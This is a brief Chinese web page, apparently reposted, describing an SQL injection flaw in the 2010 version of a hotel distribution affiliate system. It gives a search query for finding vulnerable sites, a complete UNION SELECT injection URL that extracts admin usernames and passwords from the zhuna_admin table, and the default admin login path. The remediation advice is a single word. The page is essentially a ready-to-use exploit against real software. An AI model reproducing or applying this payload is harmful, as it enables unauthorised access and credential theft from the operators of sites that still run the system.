住哪酒店分销联盟系统2010 SQL注入漏洞及修复 -

适用版本：住哪酒店分销联盟系统2010 Search： inurl:index.php?m=hotelinfo http://www.2cto.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin

默认后台：index.php?m=admin/login

修复：过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did11581

更新时间：2022-09-13 阅读：45次